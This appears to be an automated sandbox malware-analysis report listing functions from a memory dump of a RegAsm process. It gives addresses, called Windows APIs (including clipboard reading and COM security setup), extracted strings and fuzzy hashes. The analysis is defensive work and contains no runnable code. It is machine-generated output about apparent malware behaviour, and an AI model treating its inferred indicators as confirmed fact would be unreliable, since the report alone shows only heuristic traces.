Similarity

API ID: InitializeThunk
String ID: WXQ#
API String ID: 2994545307-351701608
Opcode ID: 3ff61014d33a6633dd3f4b659a26e93b24b14a3f9ad227fead7cb3d08c00b0e9
Instruction ID: 31aa15169e1b5e15d3c420a37b3f822bba6cdea05db603c0d4f94b8e9d28b3b3
Opcode Fuzzy Hash: 3ff61014d33a6633dd3f4b659a26e93b24b14a3f9ad227fead7cb3d08c00b0e9
Instruction Fuzzy Hash: 5A817B75304B818BE3258B36A8E17B7BBD3AF92310F58856EC4D747382C77978068B59

Function 0043CBA0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043F23B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043CBCE

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043FA10 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

@, xrefs: 0043FA79

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 3a4f7af6b6f264105499514002523756e6ac8396a2d79c558cb2ec7896355757
Instruction ID: 93299e3f6d9974a87428a42a14c7d51b2f37ce9cab66b157977dd25a173c901b
Opcode Fuzzy Hash: 3a4f7af6b6f264105499514002523756e6ac8396a2d79c558cb2ec7896355757
Instruction Fuzzy Hash: 0631D0725083058FC314DF54D8D1A6BF7F5FB95304F15983EE684472A0D779A9088B9A

Function 004269D0 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b9169fc068729dafb316ee8bbd075ee8ff568d8c282c4e76af64586d2ce90928
Instruction ID: f2f488554f5af74a9f699af3cd51b1747c6784f9e3a3badab06b50a01277d42d
Opcode Fuzzy Hash: b9169fc068729dafb316ee8bbd075ee8ff568d8c282c4e76af64586d2ce90928
Instruction Fuzzy Hash: 46C16E72B083604BD714DF25EC8136B7B92EBD1314F9AC53EE8859B345E639DD06838A

Function 00440420 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a09f47a1aec465822ea0879d511b71a4053b88e0f2023a204fdbee8d1ca7a9c
Instruction ID: b3942d7409b86818374b666344ac0258da173b84f2dfc066a9a277d5e24fcb4e
Opcode Fuzzy Hash: 5a09f47a1aec465822ea0879d511b71a4053b88e0f2023a204fdbee8d1ca7a9c
Instruction Fuzzy Hash: 879179366083008FE718CF14D892A6FB7E2EBD5304F19852DEA864B391DB35AC55CB86

Function 004376D0 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76dfb7a501ce06d7d364b0741a5670d7723fba48046d0a2160090df617b9e159
Instruction ID: 7108337f51e6c6dc2ef65e59cb079ba99fe6cfcb9cad7a267b5e6ce959a0fbc6
Opcode Fuzzy Hash: 76dfb7a501ce06d7d364b0741a5670d7723fba48046d0a2160090df617b9e159
Instruction Fuzzy Hash: D8B13AB6D082548FEB14DB7CC4553AE7FE1AB4A310F19816EC986A73C1C63D8941C786

Function 0043FB50 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cab8b4ba58805abbac959b51fd5861513f176ca04a823a141401b78999185acf
Instruction ID: f9b2416e98fe2f46a30cda9296170da9e2a638d07bc874e8f0ccff9577cb40e2
Opcode Fuzzy Hash: cab8b4ba58805abbac959b51fd5861513f176ca04a823a141401b78999185acf
Instruction Fuzzy Hash: DD710632A083419FDB14DF14D895A6BB3E2FFD9300F19943EE58587365DB38A814C786

Function 0043A330 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 827c9172ba4c2e6c4997a6aa26ea9dea6ff4fff03692e3253792225e99e78c75
Instruction ID: 71d62e5486068c96453a905397a4d3df5c7b615d3f0db485562de9901edaaa2f
Opcode Fuzzy Hash: 827c9172ba4c2e6c4997a6aa26ea9dea6ff4fff03692e3253792225e99e78c75
Instruction Fuzzy Hash: FC718837A483114BD314DF28DC8166BB3A2EBC9308F1DD53EC9C197385EA399C11878A

Function 0043CF16 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043CF16
GetForegroundWindow.USER32 ref: 0043CF30

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 88ec8dce92963c2de8933f426e5eb01fae6dd3c4f5f609cf3a0f9c1ee568e6c6
Instruction ID: cf9ad1ceff3c2ef5134ab06e195b08e92044d8aa4e01f3c3ae79c5d189cd98f7
Opcode Fuzzy Hash: 88ec8dce92963c2de8933f426e5eb01fae6dd3c4f5f609cf3a0f9c1ee568e6c6
Instruction Fuzzy Hash: EDD0C9F9D524008B964CA765FE5A91F36369F5B20D718903EF40701263EA28661A8A8E

Function 0043CAF0 Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043CB51

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bec2076c93c6068c5b9379291caeb2b5534d556367eb6fa474610ce843c52185
Instruction ID: 75e3d95ce12a1cb952517c11389bab7cccd8a7795c5b4296fe2857380f9ed1ec
Opcode Fuzzy Hash: bec2076c93c6068c5b9379291caeb2b5534d556367eb6fa474610ce843c52185
Instruction Fuzzy Hash: A701247540E200CBD7046B30FC53A6F7BA49F4B308F00047EE4C256652EA3A982A8B9B

Function 0043A220 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043A2A2

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ba954b6d65dc562a6bfdcbe9f2614e4e73188bad997a5054f18d108c003b6e4e
Instruction ID: 50dc055f8fdb761455b0a8e27740004e02ed19ac38c054a9ef96644fb015f5db
Opcode Fuzzy Hash: ba954b6d65dc562a6bfdcbe9f2614e4e73188bad997a5054f18d108c003b6e4e
Instruction Fuzzy Hash: 9E0190335C91285BC3008EAC9C405A6BBD6EBD5266F2E123DD8C897740D5759C0A83D0

Function 0043A2B0 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043A319

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3b1e6f5c17aa32d5277a20b72e20a54a1d6ff48d49ca6c26c4ba6527a2bde88b
Instruction ID: de2d86f3ddd0fef6dadeaa83687c211f0cbe2a1011b65472aabbea47886e8123
Opcode Fuzzy Hash: 3b1e6f5c17aa32d5277a20b72e20a54a1d6ff48d49ca6c26c4ba6527a2bde88b
Instruction Fuzzy Hash: 65F04432B191104BC319CF28EC2496B3BA3EFDB301F1884BCD1428B298CA309916C645

Function 004318D8 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0043191D

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 7d0bc401bbfd554577852eecb2743482d6bf31b59b529c7d96f2a5a4961f930d
Instruction ID: 29525e0519a525de2f0f83bc609eff8df6eba8d96017351f2023f6535e0a7f05
Opcode Fuzzy Hash: 7d0bc401bbfd554577852eecb2743482d6bf31b59b529c7d96f2a5a4961f930d
Instruction Fuzzy Hash: 01F0E2B4A08301CFE314DF28C598746BBF1FB89304F108A1DE4998B394CBB9A5498F82

Function 00430CEA Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00430D2F

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: a953b10c7e68156f481cf2e680691e4d966717494b135f22ce19291bb10cc4df
Instruction ID: 30bbb36b16b132b32a786f86532ea964a50d381536e22d8c3f9e435d2202c6f7
Opcode Fuzzy Hash: a953b10c7e68156f481cf2e680691e4d966717494b135f22ce19291bb10cc4df
Instruction Fuzzy Hash: EFF0F8B45093028FE304DF28D1A871BBBE0FB84304F10891CE4958B391DBB5A648CF82

Function 0040E053 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E065

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 4c22ff1705403105d0f9667471604251ae79c78669593f04849de65d0d1017c5
Instruction ID: c1921956ba3ff42bd303921680b0f16760227ac7a3cc34ded304ac12778215d0
Opcode Fuzzy Hash: 4c22ff1705403105d0f9667471604251ae79c78669593f04849de65d0d1017c5
Instruction Fuzzy Hash: 85D0C9343C83417AF1344748EC13F1032116746F15F700228B323FE2E0C9D07111861D

Function 0040E020 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E033

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: ab9727047bc50df9b2e786e9377ea7ce8fbe9fff57a96f71d7349289fc1eaa30
Instruction ID: e7b2d579076174578b75bf3dc3c8f43c41ab86515a4a3b59c97330ed574efdda
Opcode Fuzzy Hash: ab9727047bc50df9b2e786e9377ea7ce8fbe9fff57a96f71d7349289fc1eaa30
Instruction Fuzzy Hash: 9FD0A7786505446FD244675CEC1BF163A6CA747BA4F800239B6A2CA1D1D9506814C569

Non-executed Functions

Function 00413820 Relevance: 56.9, Strings: 44, Instructions: 1928COMMON

Download Yara Rule

Strings

9, xrefs: 00413BA2
l, xrefs: 00414DC9
#, xrefs: 00414FC4
,, xrefs: 00414030
7, xrefs: 00415024
J, xrefs: 00414876
`, xrefs: 00414642
3, xrefs: 0041447B
k, xrefs: 00413999
*, xrefs: 004138F3
9, xrefs: 0041444B
D, xrefs: 00415218
!, xrefs: 00414FB4
", xrefs: 004147EA
a, xrefs: 00413E36
g, xrefs: 00413A53
7, xrefs: 0041445B
0, xrefs: 00414483
n, xrefs: 0041452C
5, xrefs: 00415014
D, xrefs: 004155EB
?, xrefs: 00414FE4
5|iL, xrefs: 00415497
;, xrefs: 00415004
', xrefs: 00414FA4
1, xrefs: 00415034
,, xrefs: 00414DE9
9, xrefs: 00414FF4
?, xrefs: 00414010
i, xrefs: 00414189
0, xrefs: 00413CC7
5, xrefs: 00414020
$, xrefs: 00414DD9
b, xrefs: 00413E3E
F, xrefs: 00414BC9
D, xrefs: 0041520B
C, xrefs: 00413E2E
3, xrefs: 00415044
k, xrefs: 0041453C
1, xrefs: 0041448B
=, xrefs: 00414FD4
5, xrefs: 0041446B
M, xrefs: 00414389
;, xrefs: 004138FB

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !$"$#$$$'$*$,$,$0$0$1$1$3$3$5$5$5$5|iL$7$7$9$9$9$;$;$=$?$?$C$D$D$D$F$J$M$`$a$b$g$i$k$k$l$n
API String ID: 0-4017944823
Opcode ID: 40a415e1354c9c615e71915a29e3134bab673830472f656079bb460e6ab55546
Instruction ID: c0f0d33dabbb30c02a18544f9fb6eb1f6d66801e157bd7da35141c590be3a5ae
Opcode Fuzzy Hash: 40a415e1354c9c615e71915a29e3134bab673830472f656079bb460e6ab55546
Instruction Fuzzy Hash: 9B139E7150C7C18AD3259B3884483DFBBE1ABD6324F188A6EE0E9873D2D7798582C757

Function 00436974 Relevance: 50.3, Strings: 40, Instructions: 269COMMON

Download Yara Rule

Strings

', xrefs: 004369E2
0, xrefs: 00436D02
L, xrefs: 00436B24
Y, xrefs: 00436AD7
>, xrefs: 00436BE4
+, xrefs: 00436C09
Q, xrefs: 00436A9F
G, xrefs: 00436A36
*, xrefs: 004369F0
<, xrefs: 00436BDB
t, xrefs: 00436980
G, xrefs: 00436AE5
[, xrefs: 00436AC9
;, xrefs: 00436A1A
:, xrefs: 00436A60
Q, xrefs: 004369C6
M, xrefs: 00436B2B
:, xrefs: 00436A0C
:, xrefs: 004369FE
_, xrefs: 00436AAD
W, xrefs: 00436A75
], xrefs: 00436ABB
C, xrefs: 00436B01
O, xrefs: 00436B1D
], xrefs: 0043699C
3, xrefs: 00436A44
@, xrefs: 00436C2D
r, xrefs: 00436A8A
/, xrefs: 004369D4
/, xrefs: 00436C19
S, xrefs: 00436A91
U, xrefs: 00436A83
9, xrefs: 00436C35
A, xrefs: 00436B0F
E, xrefs: 00436AF3
o, xrefs: 00436B16
-, xrefs: 004369AA
), xrefs: 00436C11
-, xrefs: 00436C21
^, xrefs: 0043698E

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: '$)$*$+$-$-$/$/$0$3$9$:$:$:$;$<$>$@$A$C$E$G$G$L$M$O$Q$Q$S$U$W$Y$[$]$]$^$_$o$r$t
API String ID: 0-1806126014
Opcode ID: 9b3d2b0dcad55ccfde1d899a5b7acc5e043b964639d2efd8ed714f88dad86684
Instruction ID: 2dd67e0cdf90c82dadc0f66599251efc4218ce18df796532f6f785d76d74e2e5
Opcode Fuzzy Hash: 9b3d2b0dcad55ccfde1d899a5b7acc5e043b964639d2efd8ed714f88dad86684
Instruction Fuzzy Hash: DFD18F319086E9CADB32C63C8C483DDBFA15B57324F0842D9D4A96B3D2C3794B86CB56

Function 00424511 Relevance: 27.3, Strings: 21, Instructions: 1018COMMON

Download Yara Rule

Strings

*(, xrefs: 0042496E
71, xrefs: 00424958
,+, xrefs: 00425284
=), xrefs: 00424963
h'v%, xrefs: 00425266
l;j9, xrefs: 004251D0, 00425211
RXB, xrefs: 00424536, 00425840
l;j9, xrefs: 004252E6
4CA, xrefs: 00424D58
O=|?, xrefs: 00425089
Q%e', xrefs: 00425047
t#r!, xrefs: 0042526E
A1A3, xrefs: 00425068
ac, xrefs: 00424B86
qs, xrefs: 00424B5A
S!U#, xrefs: 0042503C
\-Z/, xrefs: 0042505D
^Q"L, xrefs: 0042510D
n)l+, xrefs: 00425052
`a, xrefs: 004250EC
E5G7, xrefs: 00425073

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: *($,+$4CA$71$=)$A1A3$E5G7$O=|?$Q%e'$RXB$S!U#$\-Z/$^Q"L$`a$h'v%$l;j9$l;j9$n)l+$t#r!$ac$qs
API String ID: 0-574941299
Opcode ID: 7b94c8c4f09007cdfdc36f50af8e525be8510683530b0dffefd30fa03dc0174a
Instruction ID: 6ca949171d7668c3285f098ef4a76302dd3bf483e4d91a6a7f45db30e3369f55
Opcode Fuzzy Hash: 7b94c8c4f09007cdfdc36f50af8e525be8510683530b0dffefd30fa03dc0174a
Instruction Fuzzy Hash: 6E9282B56083918BE334CF24E8807AFBBE1FB85340F94892DD5D99B250DB748946CF96

Function 0041E9E0 Relevance: 20.8, Strings: 16, Instructions: 811COMMON

Download Yara Rule

Strings

'$ ", xrefs: 0041F089
w@Dt, xrefs: 0041ED78
|, xrefs: 0041F099
5Vcv, xrefs: 0041ED30
zYF", xrefs: 0041ED48
a`75, xrefs: 0041ED68
[FAZ, xrefs: 0041ED83
t$QU, xrefs: 0041ED58
SVj-, xrefs: 0041EB9D
^_^B, xrefs: 0041ED40
J-r4, xrefs: 0041ED38
T, xrefs: 0041EC03
H, xrefs: 0041ED8E
pAj\, xrefs: 0041ED60
NNWL, xrefs: 0041ED99
RE, xrefs: 0041EDBA

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: '$ "$5Vcv$H$J-r4$NNWL$RE$SVj-$T$[FAZ$^_^B$a`75$pAj\$t$QU$w@Dt$zYF"$|
API String ID: 0-1348714487
Opcode ID: a0661740468735508f79b7034afefd7101e948d7844e8f4e94ed20007505a4fe
Instruction ID: 26e683b9a888f37dbda87abb1aaca43ce90a0c683686eb054251359bf65b718a
Opcode Fuzzy Hash: a0661740468735508f79b7034afefd7101e948d7844e8f4e94ed20007505a4fe
Instruction Fuzzy Hash: E55258745083808FD721CF25C8507AFBFE1AF95314F188A6EE8E45B392D739894ACB56

Function 00426E60 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 287COMMON

Download Yara Rule

Strings

$W U, xrefs: 00427654
H, xrefs: 00427601
+[&Y, xrefs: 0042765C
cS'Q, xrefs: 0042764C
H-X#, xrefs: 004278D1
X+\), xrefs: 0042772F, 00427734
c/g-, xrefs: 00427644
!, xrefs: 004278D9
w1u, xrefs: 00427694

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: w1u$ !$$W U$+[&Y$H-X#$H$X+\)$c/g-$cS'Q
API String ID: 0-779046228
Opcode ID: b25611be40558189cd25667367b01046f5993866854972c6339b2a6b9a605778
Instruction ID: 6cf005a4915137690759ca465b12f7d53114f96a59d06f0530c4b5dc33b433e2
Opcode Fuzzy Hash: b25611be40558189cd25667367b01046f5993866854972c6339b2a6b9a605778
Instruction Fuzzy Hash: 0DA1EDB560C3908BD7209F25E89536FBBE1FF82358F44592CE1C59B2A1E7788505CB8B

Function 0040C640 Relevance: 16.8, Strings: 13, Instructions: 506COMMON

Download Yara Rule

Strings

{OpA, xrefs: 0040C72A
c?O1, xrefs: 0040C70E
8_/Q, xrefs: 0040C746
Ds?u, xrefs: 0040C79D
_o^a, xrefs: 0040C76B
pCbE, xrefs: 0040C731
+K{M, xrefs: 0040C723
|G/Y, xrefs: 0040C738
)gFy, xrefs: 0040C77F
H7JI, xrefs: 0040C71C
#[$], xrefs: 0040C73F
^cRe, xrefs: 0040C775
<kJm, xrefs: 0040C761

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #[$]$)gFy$+K{M$8_/Q$<kJm$Ds?u$H7JI$^cRe$_o^a$c?O1$pCbE${OpA$|G/Y
API String ID: 0-336481955
Opcode ID: bbe114d893e78db570a8a73979ad8e45347297aedd6eeb6f873d0697e1d62e15
Instruction ID: cc965bbf7d205d8a86877bb72f310fb0912814e7ec1b1996c0cc9637904c87ac
Opcode Fuzzy Hash: bbe114d893e78db570a8a73979ad8e45347297aedd6eeb6f873d0697e1d62e15
Instruction Fuzzy Hash: D012CCB5201B00CFE3248F2AD891797BBF2FB86324F15892DD5AA877A0CB74A415CF45

Function 0040C0F0 Relevance: 16.7, Strings: 13, Instructions: 421COMMON

Download Yara Rule

Strings

_'[%, xrefs: 0040C1E3
zkji, xrefs: 0040C25B
C\QO, xrefs: 0040C430
\+^), xrefs: 0040C1DB
'[(Y, xrefs: 0040C23B
6K;I, xrefs: 0040C21B
%W'U, xrefs: 0040C243
,o}m, xrefs: 0040C253
C\QO, xrefs: 0040C4B0, 0040C5EC, 0040C4F1, 0040C5AF, 0040C370, 0040C4FD, 0040C5B8, 0040C560, 0040C3C4
(S)Q, xrefs: 0040C24B
, xrefs: 0040C10E
o/^-, xrefs: 0040C1D3
W?O=, xrefs: 0040C1F3

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $%W'U$'[(Y$(S)Q$,o}m$6K;I$C\QO$C\QO$W?O=$\+^)$_'[%$o/^-$zkji
API String ID: 0-2026422900
Opcode ID: 4a07d825c64d41906b0a208be29ad2852f1fe41e08a8ed397bb5cd8800ae363e
Instruction ID: ef76aeaef1909a9e056732c7d2f0a532c42ff88f69d602b9a76ffdc04e14919c
Opcode Fuzzy Hash: 4a07d825c64d41906b0a208be29ad2852f1fe41e08a8ed397bb5cd8800ae363e
Instruction Fuzzy Hash: 04D1077650C3518BC324CF25C89126BBBE2ABC1714F18CA3EE4D59B395D779C90ACB86

Function 004370F0 Relevance: 14.0, Strings: 11, Instructions: 249COMMON

Download Yara Rule

Strings

^, xrefs: 00437262
J, xrefs: 00437267
C, xrefs: 00437378
\, xrefs: 0043726C
@, xrefs: 0043737D
Y, xrefs: 0043725D
s, xrefs: 0043720B
m, xrefs: 0043732B
n, xrefs: 004371FC
v, xrefs: 00437382
V, xrefs: 00437387

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: @$C$J$V$Y$\$^$m$n$s$v
API String ID: 0-2318058290
Opcode ID: 608ba30398207b2a7248694679e46b2cb0b66d3f468c08281088678682f819ac
Instruction ID: 763445e9591f6b7e9bbf99621cf57ffba953bcb29c1ccbb3e80b297c3b32ac37
Opcode Fuzzy Hash: 608ba30398207b2a7248694679e46b2cb0b66d3f468c08281088678682f819ac
Instruction Fuzzy Hash: 7191B6A261C7D04AD725813C884435FAFD25BEB224F1D9FAEE8E6873C2D169C806D357

Function 0041A670 Relevance: 13.6, APIs: 2, Strings: 5, Instructions: 1311COMMON

Download Yara Rule

APIs

Part of subcall function 0043CBA0: LdrInitializeThunk.NTDLL(0043F23B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043CBCE

FreeLibrary.KERNEL32(?), ref: 0041AC4D
FreeLibrary.KERNEL32(?), ref: 0041ACCE

Strings

ZM, xrefs: 0041AA95
Wu, xrefs: 0041AC4D, 0041ACCE
EA, xrefs: 0041AAA5
TM, xrefs: 0041AA9D
0;:y, xrefs: 0041AEA3

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: 0;:y$EA$TM$ZM$Wu
API String ID: 764372645-316742611
Opcode ID: 6c885257e33da094b73d62231ed23447d0dc466b1a67ff93d8319556f87f6363
Instruction ID: 00b3b5b24c70a2ae2c89518c748a987ad6380b35ac6b4ffd907bc2d19f0cc6e9
Opcode Fuzzy Hash: 6c885257e33da094b73d62231ed23447d0dc466b1a67ff93d8319556f87f6363
Instruction Fuzzy Hash: AB8215756083409FE714CF25D8807ABBBA3FBC5304F19882EE4C197352DB79D8568B9A

Function 00422D37 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

FL@H, xrefs: 00422DEA
.9, xrefs: 00422E62
mqwE, xrefs: 00422DFA
}Ic`, xrefs: 00422E12
_rWy, xrefs: 00422D8E, 00422DA6
QQ{e, xrefs: 00422E1A
`4B, xrefs: 004233D0
_rWy, xrefs: 00422F08

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: .9$FL@H$QQ{e$_rWy$_rWy$`4B$mqwE$}Ic`
API String ID: 0-3900228902
Opcode ID: 1aa1cda1d4250c4a090986814edc6ef974d1378e79544050490d0804d5afd2de
Instruction ID: 3332b9574bfc980b431beff1165e6d63171f8d8af8b04f7c067e516c30bad33e
Opcode Fuzzy Hash: 1aa1cda1d4250c4a090986814edc6ef974d1378e79544050490d0804d5afd2de
Instruction Fuzzy Hash: 36422375608311CFD714CF28EC8172AB3A2FB8A315F4A897CE89197391DB399911CB86

Function 00432890 Relevance: 9.1, APIs: 6, Instructions: 131clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004328B4
GetWindowLongW.USER32 ref: 004328D9
GetClipboardData.USER32 ref: 004328E9
GlobalLock.KERNEL32 ref: 0043290D
GlobalUnlock.KERNEL32 ref: 00432A1B
CloseClipboard.USER32 ref: 00432A23

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: c5ab0d83e64b765c744701c2e6a3dd54d72007aada7ab799a775c92818878a9a
Instruction ID: d5811a73d5b686d0d6575232bdd5e68714ec5fa6142b954448edde04a2527739
